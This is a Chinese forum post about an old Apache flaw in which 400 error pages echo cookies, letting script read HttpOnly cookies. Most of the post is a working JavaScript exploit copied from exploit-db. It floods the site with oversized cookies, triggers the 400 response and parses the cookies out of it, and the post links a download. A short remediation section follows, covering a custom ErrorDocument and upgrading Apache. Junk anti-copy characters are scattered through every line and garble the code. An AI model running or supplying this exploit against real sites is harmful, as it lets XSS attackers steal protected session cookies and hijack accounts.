很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
& ], ^; u& R" e
. Q. _/ k, }. _8 q2 B u用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
$ T9 M2 L! C% L8 _. y: J, M/ U' B: Z3 u
. D+ H8 f. p# t& p9 u2 j5 f: w& F& @& y* G
// http://www.exploit-db.com/exploits/18442/
# p, u$ S0 Q7 @. F9 pfunction setCookies (good) {2 n4 B6 c7 o: @8 W
// Construct string for cookie value
, w, P4 }. o$ f+ yvar str = "";
6 z2 }6 a& T: S1 f" O0 B* }8 jfor (var i=0; i< 819; i++) {( A4 \! L _1 t% O! K1 B: L
str += "x";
b) U) L( D# D1 K! U7 q, O}
" a2 C! D$ L# ^. D// Set cookies
' c& S) W4 [% K% [' ]) z4 N- z& Dfor (i = 0; i < 10; i++) {0 \; l a: u/ U, f. m1 p0 P
// Expire evil cookie8 s/ S3 C: |8 }( v1 l" r
if (good) {, B+ o! R; }3 j+ ~8 w# t
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
) v, d- M+ ]5 k/ P5 f}
0 Z0 B( v( D0 C// Set evil cookie
" Y0 C' A4 E$ s# P6 c& eelse {
6 F; G: L0 Q# r' \; Bvar cookie = "xss"+i+"="+str+";path=/";
E! E/ k" p" u# X}
8 Q+ }) A1 m5 G( h" k( d6 j" b( Vdocument.cookie = cookie;3 ?4 ^# D/ O( a, _& ^7 e7 r
}/ H8 i& ]+ r- W7 j2 C: J
}
w% q# z$ P! C. k2 gfunction makeRequest() {9 K& I* M- G; c, H2 S$ w; T
setCookies();
. w Z% m. a' O0 G$ jfunction parseCookies () {
o- ^% @( M0 U0 X8 B& M# W8 \var cookie_dict = {};" x7 K1 ^& o7 a/ ^7 d
// Only react on 400 status1 J8 c$ o3 P6 u3 E
if (xhr.readyState === 4 && xhr.status === 400) {
5 h4 h* v7 B1 C3 z6 r+ l// Replace newlines and match <pre> content
5 W& O6 z. W1 C1 H _8 Kvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
! h5 n. I; t+ Q4 Z. V8 j: U9 o4 o9 A' Yif (content.length) {' L D1 }6 l0 H' a N) b% F
// Remove Cookie: prefix
7 R9 t; C; _4 T7 D5 B" Ucontent = content[1].replace("Cookie: ", "");
3 }# S. f0 ]9 ~- d- s. ivar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
- y, z: w2 S1 l$ e// Add cookies to object- O2 x( h) l/ p) U/ `( D- _: l3 H
for (var i=0; i<cookies.length; i++) {
( x' Q; ~* w. D6 h/ cvar s_c = cookies.split('=',2);
, c9 o/ X: g- [# j# v0 ^& I5 Wcookie_dict[s_c[0]] = s_c[1];
5 O4 ?/ ~% [1 v% |, K* ]3 g* ]6 r/ w}
. Z% y2 ~4 o) h" |}
8 c. b. B6 i9 q" _3 m// Unset malicious cookies% y3 m$ ?! h2 `9 O. F W% P
setCookies(true);
& c$ c! R0 H' o. B4 f2 w5 O$ Valert(JSON.stringify(cookie_dict));
" i" D4 ~# V5 y7 i8 N$ k( b u: ? Z}
\; ~ R* s6 l; Z# _) n( v}: F6 q$ g5 j' G& Y1 x
// Make XHR request0 y! C9 c( y7 e \1 B
var xhr = new XMLHttpRequest();# F/ J( R6 i6 l3 l4 b3 u6 t
xhr.onreadystatechange = parseCookies;
+ o% a8 c: j% `% {" k8 m; v# `xhr.open("GET", "/", true);
+ i2 z# [ V3 K dxhr.send(null);% i: P- B9 n# u# w$ h n0 ?
}
5 D" {# W" O1 A7 m: \1 \8 H/ ^7 AmakeRequest();
$ G9 b/ Z/ \6 Z4 Q- a
9 o7 \9 x0 i3 K' R E7 i) ^) z/ R+ O你就能看见华丽丽的400错误包含着cookie信息。! {- b( K- u' O) ?
8 v, Z2 a/ q/ p& D& I1 B1 R8 z6 E
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#" M0 [, d1 i$ B9 o/ Q, [
/ F! ? E( ?; S1 t; L* v: y* Y修复方案:
* U5 r* R3 P. n5 T" L1 u
% s n& C: a S) l0 ?/ |" s5 GApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下" @. o; s k, t% W' `8 r
+ T' b2 ] N: ?+ y. | A
In the event of a problem or error, Apachecan be configured to do one of four things,
7 ~/ I- g, O- M) u
- U( k* d: p5 K" f4 d1. output asimple hardcoded error message输出一个简单生硬的错误代码信息; z% I2 z y! N9 q
2. output acustomized message输出一段信息
' ~( e1 k+ H6 E! U/ I0 O3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
: j( I. t# c+ D8 z p5 n4. redirect to an external URL to handle theproblem/error转向一个外部URL) h$ h6 k; O% z2 Y( }/ r
" ?$ K7 v( h4 L- B' S
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容# n9 ?* L8 p5 _1 X( H
% M* P# y/ R( V7 R9 t9 m( e
Apache配置:
# W7 @2 E# p/ b& R6 l
' m; K6 x j& N8 b& \ErrorDocument400 " security test"
- C3 h) |( B ~! s8 R/ ]) f! z1 W: z% q' S* A( a
当然,升级apache到最新也可:)。# R: b9 O& R p2 i" A
" J+ z! o% U: [. A; J3 q参考:http://httpd.apache.org/security/vulnerabilities_22.html+ {1 |, k; b4 V& }! ?
9 J7 W u" ~% z7 _/ f+ {. r5 @, G |